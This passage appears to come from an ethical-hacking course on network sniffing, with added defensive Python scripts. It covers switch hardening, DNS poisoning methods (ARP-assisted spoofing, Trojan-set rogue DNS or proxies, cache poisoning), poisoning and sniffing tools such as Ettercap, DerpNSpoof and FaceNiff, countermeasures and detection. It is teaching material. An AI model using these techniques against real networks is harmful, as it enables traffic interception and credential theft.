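                                       "client_port": "Gi1/0/5", "yiaddr": "10.0.0.99", "vlan": 10, "lease": 3600})
    # ARP from the bound host on its own port passes DAI.
    results["arp_ok"] = sw.on_arp({"in_port": "Gi1/0/5", "sender_mac": "aa:aa:aa:00:00:05", "sender_ip": "10.0.0.10"})
    # Gratuitous ARP claiming the gateway address from another port fails DAI.
    results["arp_spoof"] = sw.on_arp({"in_port": "Gi1/0/7", "sender_mac": "bb:bb:bb:00:00:07", "sender_ip": "10.0.0.1"})
    # IP traffic with the bound source passes; the same source IP from another port does not.
    results["ip_ok"] = sw.on_ip({"in_port": "Gi1/0/5", "src_mac": "aa:aa:aa:00:00:05", "src_ip": "10.0.0.10"})
    results["ip_spoof"] = sw.on_ip({"in_port": "Gi1/0/7", "src_mac": "bb:bb:bb:00:00:07", "src_ip": "10.0.0.10"})
    results["bindings"] = len(sw.bindings)
    results["dropped"] = len(sw.dropped)
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The order of operations matters in practice as it does in the model: DAI and IPSG can only pass hosts that already have a binding, so statically addressed hosts need a static binding entry or they are cut off when the features are switched on.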
How to Defend Against VLAN Hopping

Defend Against Switch Spoofing

Perform the following steps to configure a switch to prevent switch spoofing attacks:

- Explicitly configure the ports as access ports, and ensure that all access ports are configured not to negotiate trunks:
      switchport mode access
      switchport nonegotiate
- Ensure that all trunk ports are configured not to negotiate trunks:
      switchport mode trunk
      switchport nonegotiate

Defend Against Double Tagging

Perform the following steps to configure a switch to prevent double tagging attacks:

- Ensure that each access port is assigned a VLAN except the default VLAN (VLAN 1):
      switchport access vlan 2
- Ensure that native VLANs on all the trunk ports are changed to an unused VLAN ID:
      switchport trunk native vlan 999
- Ensure that native VLANs on all the trunk ports are explicitly tagged:
      vlan dot1q tag native
How to Defend Against STP Attacks

Implement the following countermeasures to defend against STP attacks on switches:

- BPDU Guard: BPDU guard must be enabled on the ports that should never receive a BPDU from their connected devices. This is used to avoid the transmission of BPDUs on PortFast-enabled ports. This feature helps in preventing potential bridging loops in the network. If BPDU guard is enabled on a switch interface and an unauthorized switch connects to it, the port will be set to errdisable mode when a BPDU is received. The errdisable mode shuts down the port and disables it from sending or receiving any traffic.
  Use the following commands to enable BPDU guard on a switch interface:
      configure terminal
      interface gigabitethernet slot/port
      spanning-tree bpduguard enable
- Root Guard: Root guard protects the STP topology. It forces the interfaces to become the designated ports (forwarding ports) to prevent the nearby switches from becoming root switches, and ensures that the root bridge remains the root. Therefore, if a port enabled with the root guard feature receives a superior BPDU, it converts that port into a loop inconsistent state (not errdisabled), thus protecting against an STP topology change. This port remains inactive only for that specific switch/switches attempting to change the STP topology. This port remains in down state until the issue is resolved.
  Use the following commands to enable the root guard feature on a switch interface:
      configure terminal
      interface gigabitethernet slot/port
      spanning-tree guard root
- Loop Guard: Loop guard improves the stability of the network by protecting it against bridging loops. It is generally used to protect against a malfunctioning switch.
  Use the following commands to enable the loop guard feature on a switch interface:
      configure terminal
      interface gigabitethernet slot/port
      spanning-tree guard loop
- UDLD (Unidirectional Link Detection): UDLD enables devices to detect the existence of unidirectional links and further disable the affected interfaces in the network. These unidirectional links in the network can cause STP topology loops.
  Use the following commands to enable UDLD on a switch interface:
      configure terminal
      interface gigabitethernet slot/port
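The VLAN hopping, STP and port-security settings above are easy to state and easy to miss on a switch with dozens of ports, so a defender normally checks the running configuration rather than each port by hand. The following audit script is an added example, not EC-Council's or Cisco's code: it parses an IOS-style configuration into interface stanzas and reports ports that still negotiate trunks (DTP), access ports left in VLAN 1 or without port security, PortFast ports without BPDU guard, and trunks whose native VLAN is still 1. SAMPLE_CONFIG is a constructed running-config excerpt written for the demo.

```python
"""Audit an IOS-style switch configuration for the VLAN hopping, STP and
port-security hardening described above.  Added example, not EC-Council's or
Cisco's code; SAMPLE_CONFIG is a constructed running-config excerpt."""
import re

SAMPLE_CONFIG = """\
vlan dot1q tag native
!
interface GigabitEthernet1/0/1
 switchport mode trunk
 switchport trunk native vlan 999
 switchport nonegotiate
!
interface GigabitEthernet1/0/2
 switchport mode dynamic desirable
!
interface GigabitEthernet1/0/3
 switchport mode access
 spanning-tree portfast
!
interface GigabitEthernet1/0/4
 switchport mode access
 switchport access vlan 20
 switchport nonegotiate
 switchport port-security
 spanning-tree portfast
 spanning-tree bpduguard enable
!
interface GigabitEthernet1/0/5
 switchport mode trunk
!
"""


def parse_config(text):
    """Split an IOS config into (global lines, {interface name: [sub-lines]}).
    Sub-lines are indented by one space; a bare '!' closes the current stanza."""
    globals_, interfaces, current = [], {}, None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line or line == "!":
            current = None
            continue
        if line.startswith(" ") and current is not None:
            interfaces[current].append(line.strip())
            continue
        current = None
        m = re.match(r"interface\s+(\S+)", line)
        if m:
            current = m.group(1)
            interfaces[current] = []
        else:
            globals_.append(line.strip())
    return globals_, interfaces


def _arg(lines, prefix, default):
    """Value following a command prefix, e.g. _arg(lines, 'switchport access vlan ', '1')."""
    for line in lines:
        if line.startswith(prefix):
            return line[len(prefix):].strip()
    return default


def audit(text):
    """Return one finding string per hardening gap found in the configuration."""
    globals_, interfaces = parse_config(text)
    findings = []
    if "vlan dot1q tag native" not in globals_:
        findings.append("global: native VLAN frames are untagged (add 'vlan dot1q tag native')")
    for name, lines in interfaces.items():
        mode = _arg(lines, "switchport mode ", None)
        if mode is None:
            continue                      # routed or unconfigured port: not a switchport
        if mode.startswith("dynamic"):    # DTP will happily form a trunk with a rogue switch
            findings.append(f"{name}: DTP negotiation enabled ('switchport mode {mode}'); switch spoofing risk")
            continue
        if "switchport nonegotiate" not in lines:
            findings.append(f"{name}: missing 'switchport nonegotiate'")
        if mode == "access":
            if _arg(lines, "switchport access vlan ", "1") == "1":
                findings.append(f"{name}: access port in default VLAN 1; double tagging risk")
            if "spanning-tree portfast" in lines and "spanning-tree bpduguard enable" not in lines:
                findings.append(f"{name}: PortFast without BPDU guard; a rogue switch could join STP")
            if "switchport port-security" not in lines:
                findings.append(f"{name}: port security not enabled; MAC spoofing risk")
        elif mode == "trunk":
            if _arg(lines, "switchport trunk native vlan ", "1") == "1":
                findings.append(f"{name}: trunk native VLAN is 1; move it to an unused VLAN")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_CONFIG):
        print(finding)
```

In the sample, only GigabitEthernet1/0/1 (a hardened trunk) and GigabitEthernet1/0/4 (a hardened access port) come back clean; the checks key on the exact command strings shown in this section, so a configuration that uses the global `spanning-tree portfast bpduguard default` form instead of the per-interface command would need that global line added to the checks.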
Sniffing Technique: DNS Poisoning

This section describes DNS poisoning techniques to sniff the DNS traffic of a target network. Using this technique, an attacker can obtain the ID of the DNS request by sniffing and can send a malicious reply to the sender before the actual DNS server responds.
DNS Poisoning Techniques

DNS is the protocol that translates a domain name (e.g., www.eccouncil.org) into an IP address (e.g., 208.66.172.56). The protocol uses DNS tables that contain the domain name and its equivalent IP address stored in a distributed large database. In DNS poisoning, also known as DNS spoofing, the attacker tricks a DNS server into believing that it has received authentic information when, in reality, it has not received any. The attacker tries to redirect the victim to a malicious server instead of the legitimate server. The attacker does this by manipulating the DNS table entries in the DNS. This results in substitution of a false IP address at the DNS level, where web addresses are converted into numeric addresses.

When the victim tries to access a website, the attacker manipulates the entries in the DNS table so that the victim's system redirects the URL to the attacker's server. The attacker replaces the IP address entries for a target site on a given DNS server with the IP address of the server (malicious server) he/she controls. The attacker can create fake DNS entries for the server (containing malicious content) with the same names as that of the target server. Thus, the victim connects to the attacker's server without realizing it. Once the victim connects to the attacker's server, the attacker can compromise the victim's system and steal data.
DNS poisoning is possible using the following techniques:

- Intranet DNS Spoofing
- Internet DNS Spoofing
- Proxy Server DNS Poisoning
- DNS Cache Poisoning
Intranet DNS Spoofing

An attacker can perform an intranet DNS spoofing attack on a switched LAN with the help of the ARP poisoning technique. To perform this attack, the attacker must be connected to the LAN and be able to sniff the traffic or packets. An attacker who succeeds in sniffing the ID of the DNS request from the intranet can send a malicious reply to the sender before the actual DNS server.

The diagram describes how an attacker performs an intranet DNS spoofing.

Figure 8.47: Intranet DNS spoofing

In the diagram, the attacker poisons the router by running arpspoof/dnsspoof to redirect DNS requests of clients to the attacker's machine. When a client (John) sends a DNS request to the router, the poisoned router sends the DNS request packet to the attacker's machine. Upon receiving the DNS request, the attacker sends a fake DNS response that redirects the client to a fake website set up by the attacker. The attacker owns the website and can see all the information submitted by the client to that website. Thus, the attacker sniffs sensitive data, such as passwords, submitted to the fake website. The attacker retrieves the required information and then redirects the client to the real website.
Internet DNS Spoofing

Internet DNS poisoning is also known as remote DNS poisoning. Attackers can perform DNS spoofing attacks on a single victim or on multiple victims anywhere in the world. To perform this attack, the attacker sets up a rogue DNS server with a static IP address. Attackers perform Internet DNS spoofing with the help of Trojans when the victim's system connects to the Internet. This is an MITM attack in which the attacker changes the primary DNS entries of the victim's computer. The attacker replaces the victim's DNS IP address with a fake IP address that resolves to the attacker's system. Thus, the victim's traffic redirects to the attacker's system. At this point, the attacker can easily sniff the victim's confidential information.

The figure illustrates an attacker performing Internet DNS spoofing. The attacker infects John's machine with a Trojan and changes his DNS IP address to that of the attacker.
Proxy Server DNS Poisoning
In the proxy server DNS poisoning technique, the attacker sets up a proxy server on the attacker's system. The attacker also configures a fraudulent DNS and makes its IP address a primary DNS entry in the proxy server. The attacker changes the proxy server settings of the victim with the help of a Trojan. The proxy serves as a primary DNS and redirects the victim's traffic to the fake website, where the attacker can sniff the confidential information of the victim and then redirect the request to the real website.

As shown in the figure, an attacker sends a Trojan to John's machine that changes his proxy server settings in Internet Explorer to those of the attacker, and redirects the request to a fake website.

Figure 8.49: Proxy server DNS poisoning
DNS Cache Poisoning

DNS cache poisoning refers to altering or adding forged DNS records in the DNS resolver cache so that a DNS query is redirected to a malicious site. The DNS system uses cache memory to hold the recently resolved domain names. The attacker populates it with recently used domain names and their respective IP address entries. When a user request is received, the DNS resolver first checks the DNS cache; if the system finds the domain name that the user requested in the cache, the resolver will quickly send its respective IP address. Thus, it reduces the traffic and time of DNS resolving.

Attackers target and make changes or add entries to this DNS cache. If the DNS resolver cannot validate that the DNS responses have come from an authoritative source, it will cache the incorrect entries locally and serve them to users who make the same request. The attacker replaces the user-requested IP address with the fake IP address and, when the user requests that domain name, the DNS resolver checks the entry in the DNS cache and picks the matched (poisoned) entry. Then, it redirects the victim to the attacker's fake server instead of the intended server.
DNS Poisoning Tools

DNS poisoning tools allow attackers to redirect a domain name to a different IP address listed in a fake DNS entry file. The DNS request made to the target site goes through a server containing malicious content with the same name.

- DerpNSpoof
  Source: https://github.com
  DerpNSpoof is a DNS poisoning tool that assists in spoofing the DNS query packet of a certain IP address or a group of hosts in the network. Using this tool, attackers can create a list of fake DNS records and load it while running the tool to redirect the victim to some other website.

Figure 8.51: Screenshot of DerpNSpoof tool

Some examples of additional DNS poisoning tools are listed below:

- DNS Spoof (https://github.com)
- DNS-poison (https://github.com)
- Ettercap (http://www.ettercap-project.org)
- Evilgrade (https://github.com)
- TORNADO (https://github.com)
How to Defend Against DNS Spoofing

Major DNS implementations have reported attacks using DNS spoofing, and this vulnerability still affects a large number of organizations. This is because of a lack of information when performing DNS queries, which allows attackers to spoof DNS responses. You have seen how an attacker carries out different types of DNS spoofing attacks. We now look at how to defend a network from these types of attacks.

Countermeasures that help prevent DNS spoofing attacks:

- Implement Domain Name System Security Extension (DNSSEC)
- Use Secure Socket Layer (SSL) for securing the traffic
- Resolve all DNS queries to a local DNS server
- Block DNS requests being sent to external servers
- Configure a firewall to restrict external DNS lookup
- Implement an intrusion detection system (IDS) and deploy it correctly
- Configure the DNS resolver to use a new random source port for each outgoing query
- Restrict the DNS recursing service, either full or partial, to authorized users
- Use DNS non-existent domain (NXDOMAIN) rate limiting
- Secure your internal machines
- Use static ARP and IP tables
- Use SSH encryption
- Do not allow outgoing traffic to use UDP port 53 as a default source port
- Audit the DNS server regularly to remove vulnerabilities
- Use sniffing detection tools
- Do not open suspicious files
- Always use trusted proxy sites
- If a company handles its own resolver, it should be kept private and well protected
- Randomize source and destination IP addresses
- Randomize Query ID
- Randomize case in the name requests
- Use Public Key Infrastructure (PKI) to protect the server
- Maintain a single or specific range of IP addresses to login to the systems
- Implement packet filtering for both inbound and outbound traffic
- Restrict DNS zone transfers to a limited set of IP addresses
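Several items in the list above (random source port per query, no fixed UDP port 53 as source, random Query ID, random case in the name) and the cache poisoning section before it describe the same defence from different angles: a resolver must not cache a reply unless it matches an outstanding query on every field the sender could not have known without seeing the query. The stub-resolver model below is an added example, not EC-Council's code and not a real resolver; it shows which checks reject a forged reply, how much guessing a blind spoofer faces with and without port randomization, and why an accepted reply still only gets the records inside the queried zone cached (the in-bailiwick rule, which is not on the page but is the standard resolver rule against one answer planting records for unrelated names). Addresses are from the 192.0.2.0/24 and 198.51.100.0/24 documentation ranges; the names are constructed.

```python
"""Stub-resolver model showing which checks stop a forged DNS reply from being
cached.  Added example, not EC-Council's code and not a real resolver; the
addresses and names are constructed (documentation IP ranges)."""
import secrets
from dataclasses import dataclass


@dataclass
class Query:
    txid: int
    sport: int      # UDP source port the query left from
    qname: str      # question name, with 0x20 case mixing applied
    server: str     # IP address the query was sent to


@dataclass
class Response:
    txid: int
    dport: int      # UDP port the reply was addressed to
    src: str        # IP address the reply came from
    qname: str      # question name echoed back by the server
    answers: dict   # name -> IP


def mix_case(name):
    """0x20 encoding ("randomize case in the name requests"): a spoofer who did
    not see the query must also guess the capitalisation pattern."""
    return "".join(c.upper() if c.isalpha() and secrets.randbits(1) else c.lower() for c in name)


class StubResolver:
    def __init__(self, random_port=True, use_0x20=True):
        self.random_port, self.use_0x20 = random_port, use_0x20
        self.cache, self.pending = {}, {}

    def send_query(self, qname, server):
        txid = secrets.randbelow(1 << 16)                                   # random Query ID
        sport = 1024 + secrets.randbelow(65536 - 1024) if self.random_port else 53
        q = Query(txid, sport, mix_case(qname) if self.use_0x20 else qname.lower(), server)
        self.pending[(txid, sport)] = q
        return q

    def accept(self, r):
        """Cache the answers only if the reply matches an outstanding query on
        txid, destination port, server address and exact question name, and
        keep only records inside the zone that was asked about."""
        q = self.pending.get((r.txid, r.dport))
        if q is None or r.src != q.server or r.qname != q.qname:
            return False
        zone = q.qname.lower().split(".", 1)[1]        # e.g. "example.com"
        for name, ip in r.answers.items():
            if name.lower() == q.qname.lower() or name.lower().endswith("." + zone):
                self.cache[name.lower()] = ip
        del self.pending[(r.txid, r.dport)]
        return True


def guess_space(random_port, letters_0x20=0):
    """Combinations a blind spoofer must cover: 16-bit txid, times the source
    port range when it is randomized, times 2^letters for 0x20 case mixing."""
    return (1 << 16) * ((65536 - 1024) if random_port else 1) * (1 << letters_0x20)


def run_demo():
    res = StubResolver()
    q = res.send_query("www.example.com", "192.0.2.53")
    answers = {"www.example.com": "192.0.2.10", "www.evil.test": "198.51.100.66"}
    out = {}
    # Blind forgery: port guessed right, txid off by one -> dropped.
    out["wrong_txid"] = res.accept(Response((q.txid + 1) % 65536, q.sport, q.server, q.qname, answers))
    # Right txid and port, but not from the server the query went to -> dropped.
    out["wrong_src"] = res.accept(Response(q.txid, q.sport, "198.51.100.53", q.qname, answers))
    # Right txid, port and source, wrong letter case in the echoed question -> dropped.
    out["wrong_case"] = res.accept(Response(q.txid, q.sport, q.server, q.qname.swapcase(), answers))
    # Genuine reply: accepted, but the out-of-bailiwick record is not cached.
    out["genuine"] = res.accept(Response(q.txid, q.sport, q.server, q.qname, answers))
    out["cache"] = dict(res.cache)
    # The same reply again matches no pending query and is ignored.
    out["replay"] = res.accept(Response(q.txid, q.sport, q.server, q.qname, answers))
    return out


if __name__ == "__main__":
    print(run_demo())
    print("fixed port 53:", guess_space(False), "random port:", guess_space(True))
```

The numbers from `guess_space` are the point of the "random source port" and "do not use UDP port 53 as a default source port" items: a resolver that always sends from port 53 leaves the spoofer 65,536 possibilities, while a random port multiplies that by the usable port range. None of these checks replace DNSSEC, which is the only item in the list that lets the resolver verify the data itself rather than the transport it arrived on.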
Sniffing Tools

System administrators use automated tools to monitor their network, but attackers misuse these tools to sniff network data. This section describes tools that an attacker can use for sniffing.
Sniffing Tool: Wireshark

Source: https://www.wireshark.org

Wireshark lets you capture and interactively browse the traffic running on a computer network. This tool uses WinPcap to capture packets on its own supported networks. It captures live network traffic from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, and FDDI networks. The captured files can be programmatically edited via the command-line. A set of filters for customized data display can be refined using a display filter.

As shown in the screenshot, attackers use Wireshark to sniff and analyze the packet flow in the target network and extract critical information about the target.

Figure 8.52: Capturing packets using Wireshark
Follow TCP Stream in Wireshark

Figure 8.54: Wireshark feature Follow TCP Stream
Display Filters in Wireshark

Source: https://wiki.wireshark.org

Wireshark features display filters that filter traffic on the target network by protocol type, IP address, port, etc. Display filters are used to change the view of packets in the captured files. To set up a filter, type the protocol name, such as arp, http, tcp, udp, dns, and ip, in the filter box of Wireshark. Wireshark can use multiple filters at a time.

Display filtering by protocol:
    arp, http, tcp, udp, dns, ip
Monitoring the specific ports:
    tcp.port==23
    ip.addr==192.168.1.100 (a specific machine)
    ip.addr==192.168.1.100 && tcp.port==23
Filtering by multiple IP addresses:
    ip.addr==10.0.0.4 or ip.addr==<second address>
Filtering by IP address:
    ip.addr==10.0.0.4
Other filters:
    ip.dst==10.0.1.50 && frame.pkt_len > 400
    ip.addr==10.0.1.12 && icmp && frame.number > 15 && frame.number < 30
    ip.src==205.153.63.30 or ip.dst==205.153.63.30
Additional Wireshark Filters

Source: https://wiki.wireshark.org

Some examples of additional Wireshark filters are listed below:

    tcp.flags.reset==1
Displays all TCP resets
    udp contains 33:27:58
Sets a filter for the hex values of 0x33 0x27 0x58 at any offset
    http.request
Displays all HTTP GET requests
    tcp.analysis.retransmission
Displays all retransmissions in the trace
    tcp contains traffic
Displays all TCP packets that contain the word "traffic"
    !(arp or icmp or dns)
Masks out arp, icmp, dns, or other protocols and allows you to view the traffic of your interest
    tcp.port==4000
Sets a filter for any TCP packet with 4000 as a source or destination port
    tcp.port eq 25 or icmp
Displays only SMTP (port 25) and ICMP traffic
    ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16
Displays only traffic in the LAN (192.168.x.x), between workstations and servers—no Internet
    ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip
Filters by a protocol (e.g., SIP) and filters out unwanted IPs
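The filters in the two sections above read naturally but hide two rules that trip people up: `ip.addr` and `tcp.port` match either endpoint of a packet, and `!=` on such a field is true only when every occurrence differs (Wireshark 3.6 and later). The evaluator below is an added example, not Wireshark code: it parses the subset of the display-filter syntax used on this page (field comparisons with `==`/`eq`, `!=`, `<`, `>`, CIDR literals, bare protocol names, `and`/`&&`, `or`/`||`, `not`/`!`, parentheses) and runs it over six constructed packet records, so the filters from the page can be tried against known input. The `contains` operator and the `tcp.flags.*` fields are not modelled; the packet dictionaries are made up and use private and documentation addresses.

```python
"""Evaluator for a subset of Wireshark display-filter syntax, run over
constructed packet records.  Added example, not Wireshark code; the packets
below are invented (private and documentation address ranges only)."""
import ipaddress
import operator
import re

TOKEN_RE = re.compile(r"\(|\)|&&|\|\||==|!=|<=|>=|<|>|!|[A-Za-z_][\w.]*|[\w.:/]+")
WORD_OPS = {"eq": "==", "ne": "!=", "gt": ">", "lt": "<", "ge": ">=", "le": "<=",
            "and": "&&", "or": "||", "not": "!"}
CMP = {"==": operator.eq, "!=": operator.ne, "<": operator.lt, ">": operator.gt,
       "<=": operator.le, ">=": operator.ge}
# Fields Wireshark matches against either end of the packet.
ALIASES = {"ip.addr": ("ip.src", "ip.dst"), "tcp.port": ("tcp.srcport", "tcp.dstport"),
           "udp.port": ("udp.srcport", "udp.dstport")}


def tokenize(text):
    toks = TOKEN_RE.findall(text)
    if "".join(toks) != "".join(text.split()):      # nothing silently skipped
        raise ValueError(f"unsupported syntax in filter: {text!r}")
    return [WORD_OPS.get(t, t) for t in toks]


class Parser:
    """Recursive descent: or-expr > and-expr > not-expr > primary."""
    def __init__(self, text):
        self.toks, self.i = tokenize(text), 0

    def peek(self):
        return self.toks[self.i] if self.i < len(self.toks) else None

    def take(self):
        tok = self.peek()
        self.i += 1
        return tok

    def parse(self):
        node = self.expr_or()
        if self.peek() is not None:
            raise ValueError("trailing tokens")
        return node

    def expr_or(self):
        node = self.expr_and()
        while self.peek() == "||":
            self.take()
            node = ("or", node, self.expr_and())
        return node

    def expr_and(self):
        node = self.expr_not()
        while self.peek() == "&&":
            self.take()
            node = ("and", node, self.expr_not())
        return node

    def expr_not(self):
        if self.peek() == "!":
            self.take()
            return ("not", self.expr_not())
        return self.primary()

    def primary(self):
        tok = self.take()
        if tok == "(":
            node = self.expr_or()
            if self.take() != ")":
                raise ValueError("expected ')'")
            return node
        if self.peek() in CMP:
            return ("cmp", tok, self.take(), self.take())
        return ("has", tok)       # bare name: protocol or field presence test


def field_values(pkt, name):
    return [pkt[f] for f in ALIASES.get(name, (name,)) if f in pkt]


def compare(actual, op, literal):
    if isinstance(actual, int):
        return CMP[op](actual, int(literal))
    if "/" in literal:            # CIDR literal such as 192.168.0.0/16
        inside = ipaddress.ip_address(actual) in ipaddress.ip_network(literal, strict=False)
        return inside if op == "==" else not inside
    return CMP[op](actual, literal)


def evaluate(node, pkt):
    kind = node[0]
    if kind == "or":
        return evaluate(node[1], pkt) or evaluate(node[2], pkt)
    if kind == "and":
        return evaluate(node[1], pkt) and evaluate(node[2], pkt)
    if kind == "not":
        return not evaluate(node[1], pkt)
    if kind == "has":
        return node[1] in pkt["protocols"] or bool(field_values(pkt, node[1]))
    _, name, op, literal = node
    values = field_values(pkt, name)
    if not values:
        return False
    if op == "!=":                # Wireshark 3.6+: true only if every occurrence differs
        return all(compare(v, "!=", literal) for v in values)
    return any(compare(v, op, literal) for v in values)


def apply_filter(text, packets):
    """Return the frame numbers the display filter would keep."""
    tree = Parser(text).parse()
    return [p["frame.number"] for p in packets if evaluate(tree, p)]


# Constructed capture of six frames; no real trace was used.
PACKETS = [
    {"frame.number": 1, "frame.pkt_len": 1000, "protocols": {"eth", "ip", "tcp"},
     "ip.src": "192.168.1.100", "ip.dst": "10.0.1.50", "tcp.srcport": 51000, "tcp.dstport": 23},
    {"frame.number": 2, "frame.pkt_len": 98, "protocols": {"eth", "ip", "icmp"},
     "ip.src": "10.0.1.12", "ip.dst": "10.0.0.4"},
    {"frame.number": 3, "frame.pkt_len": 90, "protocols": {"eth", "ip", "udp", "dns"},
     "ip.src": "192.168.1.100", "ip.dst": "192.0.2.53", "udp.srcport": 40000, "udp.dstport": 53},
    {"frame.number": 4, "frame.pkt_len": 60, "protocols": {"eth", "arp"}},
    {"frame.number": 20, "frame.pkt_len": 500, "protocols": {"eth", "ip", "icmp"},
     "ip.src": "10.0.0.4", "ip.dst": "10.0.1.12"},
    {"frame.number": 21, "frame.pkt_len": 1514, "protocols": {"eth", "ip", "tcp"},
     "ip.src": "192.168.0.5", "ip.dst": "192.168.10.7", "tcp.srcport": 4000, "tcp.dstport": 443},
]

if __name__ == "__main__":
    for f in ("ip.addr==192.168.1.100 && tcp.port==23", "!(arp or icmp or dns)",
              "ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16", "ip.addr != 10.0.0.4 && icmp"):
        print(f"{f:55} -> frames {apply_filter(f, PACKETS)}")
```

The last filter in the demo is the instructive one: `ip.addr != 10.0.0.4 && icmp` keeps nothing, because both ICMP frames have 10.0.0.4 as one of their two addresses. Someone wanting "ICMP not involving 10.0.0.4" gets exactly that; someone wanting "ICMP where at least one side is not 10.0.0.4" needs `!(ip.addr == 10.0.0.4)` semantics to be thought through first.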
Sniffing Tools

- SteelCentral Packet Analyzer
  Source: https://www.riverbed.com
  SteelCentral Packet Analyzer provides a graphical console for high-speed packet analysis. This tool comes integrated with Riverbed AirPcap adapters to analyze and troubleshoot 802.11 wireless networks.
  As it captures terabytes of packet data traversing the network, this tool reads that traffic and displays it in a graphical user interface (GUI). It can analyze multi-gigabyte recordings from locally presented trace files or on remote SteelCentral NetShark probes (physical, virtual, or embedded on SteelHeads) without a large file transfer, to identify anomalous network issues or diagnose and troubleshoot complex network and application performance issues down to the bit level.

Figure 8.55: Screenshot of SteelCentral Packet Analyzer

- Capsa Network Analyzer
  Source: https://www.colasoft.com
  Capsa Network Analyzer is a network-monitoring tool that captures all the data transmitted over the network and provides a wide range of analysis statistics in an intuitive and graphic way. The tool helps to analyze and troubleshoot the problem that has occurred (if any) in the network. It is also able to perform advanced protocol analyzing, in-depth packet decoding, reliable network forensics, and automatic expert diagnosis. It helps you to detect network vulnerabilities.
Figure 8.56: Screenshot of Capsa Network Analyzer

- OmniPeek
  Source: https://www.liveaction.com
  OmniPeek Network Analyzer provides real-time visibility and expert analysis of each part of the target network. This tool will analyze, drill down, and fix performance bottlenecks across multiple network segments. Analytic plug-ins provide targeted visualization and search abilities within OmniPeek. The Google Maps plug-in enhances the analysis capabilities of OmniPeek. It displays a Google map in the OmniPeek capture window that shows the locations of all the public IP addresses of captured packets.
  Attackers can use OmniPeek to monitor and analyze network traffic of the target network in real time, identify the source location of that traffic, and attempt to obtain sensitive information, as well as find any network loopholes.

Figure 8.57: Screenshot of OmniPeek
Some examples of additional sniffing tools are listed below:

- Observer Analyzer (https://www.viavisolutions.com)
- PRTG Network Monitor (https://www.paessler.com)
- SolarWinds Deep Packet Inspection and Analysis (https://www.solarwinds.com)
- Xplico (https://www.xplico.org)
- Colasoft Packet Builder (https://www.colasoft.com)
Packet Sniffing Tools for Mobile Phones

- Sniffer Wicap
  Source: https://play.google.com
  This tool is a mobile network packet sniffer for ROOT ARM droids. It works on rooted Android mobile devices. Attackers can use this tool to capture packets for various types of connections, such as Wi-Fi, 3G, and LTE.

Figure 8.58: Screenshot of Sniffer Wicap

- FaceNiff
  Source: http://faceniff.ponury.net
  FaceNiff is an Android app that can sniff and intercept web session profiles over a Wi-Fi connection to a mobile. This app works on rooted Android devices. The Wi-Fi connection should be over open, WEP, WPA-PSK, or WPA2-PSK networks while sniffing the sessions.

Figure 8.59: Screenshot of FaceNiff

- Packet Capture
  Source: https://play.google.com
  Packet Capture is a network traffic sniffer app with SSL decryption. It is a powerful debugging tool, especially when developing an app.

Figure 8.60: Screenshot of Packet Capture
Countermeasures

The previous section describes how an attacker carries out sniffing with different techniques and tools. This section describes countermeasures and possible defensive techniques used to defend a target network against sniffing attacks.
How to Defend Against Sniffing

Listed below are some of the countermeasures to be followed to defend against sniffing:

- Restrict physical access to the network media to ensure that a packet sniffer cannot be installed
- Use end-to-end encryption to protect confidential information
- Permanently add the MAC address of the gateway to the ARP cache
- Use static IP addresses and ARP tables to prevent attackers from adding the spoofed ARP entries for machines in the network
- Turn off network identification broadcasts and, if possible, restrict the network to authorized users to protect the network from being discovered with sniffing tools
- Use IPv6 instead of IPv4
- Use encrypted sessions such as SSH instead of telnet, Secure Copy (SCP) instead of FTP, and SSL for email connection to protect wireless network users against sniffing attacks
- Use HTTPS instead of HTTP to protect usernames and passwords
- Use a switch instead of the hub, as a switch delivers data only to the intended recipient
- Use Secure File Transfer Protocol (SFTP) instead of FTP for secure transfer of files
- Use PGP and S/MIME, VPN, IPSec, SSL/TLS, SSH, and one-time passwords (OTP)
- Use POP2 or POP3 instead of POP to download emails from email servers
- Use SNMPv3 instead of SNMPv1 and SNMPv2 to manage networked devices
- Always encrypt the wireless traffic with a strong encryption protocol such as WPA or WPA2
- Retrieve MAC addresses directly from NICs instead of the OS; this prevents MAC address spoofing
- Use tools to determine if any NICs are running in promiscuous mode
- Use the concept of Access Control List (ACL) to allow access only to a fixed range of trusted IP addresses in a network
- Change default passwords to complex passwords
- Avoid broadcasting SSIDs (Service Set Identifiers)
- Implement a MAC filtering mechanism on your router
- Implement network scanning and monitoring tools to detect malicious intrusions, rogue devices, and sniffers connected to the network
Sniffing Detection Techniques

It is very difficult to detect passive sniffers, especially when they are running on a shared Ethernet. This section discusses some sniffing detection techniques.
How to Detect Sniffing

It is not easy to detect a sniffer on a network as it only captures data and runs in promiscuous mode. Promiscuous mode allows a network device to intercept and read each network packet that arrives in its entirety. The sniffer leaves no trace as it does not transmit data. To find sniffers, check for systems that are running in promiscuous mode, which is an NIC mode that allows all packets (traffic) to pass without validating their destination address. Standalone sniffers are difficult to detect because they do not transmit data traffic. The reverse DNS lookup method helps to detect non-standalone sniffers. There are many tools, such as Nmap, that are available to use for the detection of promiscuous mode. Run IDS and note whether the MAC addresses of certain machines have changed (for example, the router's MAC address). An IDS can detect sniffing activities on a network. It notifies or alerts the administrator when a suspicious activity, such as sniffing or MAC spoofing, occurs. Network tools such as Capsa Portable Network Analyzer monitor the network for strange packets such as those with spoofed addresses. This tool can collect, consolidate, centralize, and analyze traffic data across different network resources and technologies.
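The paragraph above and the "use tools to determine if any NICs are running in promiscuous mode" countermeasure both come down to reading one flag on each interface. On Linux the kernel exposes it in `/sys/class/net/<iface>/flags` as a hex word whose 0x100 bit is IFF_PROMISC, which is the same flag `ip link show` prints as PROMISC. The script below is an added example, not EC-Council's code: it decodes that word, scans sysfs on the host it runs on, and applies the same decoder to a constructed set of flag values so the logic can be checked on any system. The sample interface names and flag strings are made up.

```python
"""Local check for NICs in promiscuous mode via the Linux sysfs flags word.
Added example, not EC-Council's code.  IFF_PROMISC is the kernel flag bit
(0x100 in linux/if.h); the sample flag strings below are constructed."""
import os

IFF_PROMISC = 0x100


def is_promiscuous(flags_text):
    """Decode the hex word found in /sys/class/net/<iface>/flags, e.g. '0x1103'."""
    return bool(int(flags_text.strip(), 16) & IFF_PROMISC)


def scan_sysfs(root="/sys/class/net"):
    """Return the names of interfaces whose flags carry IFF_PROMISC.
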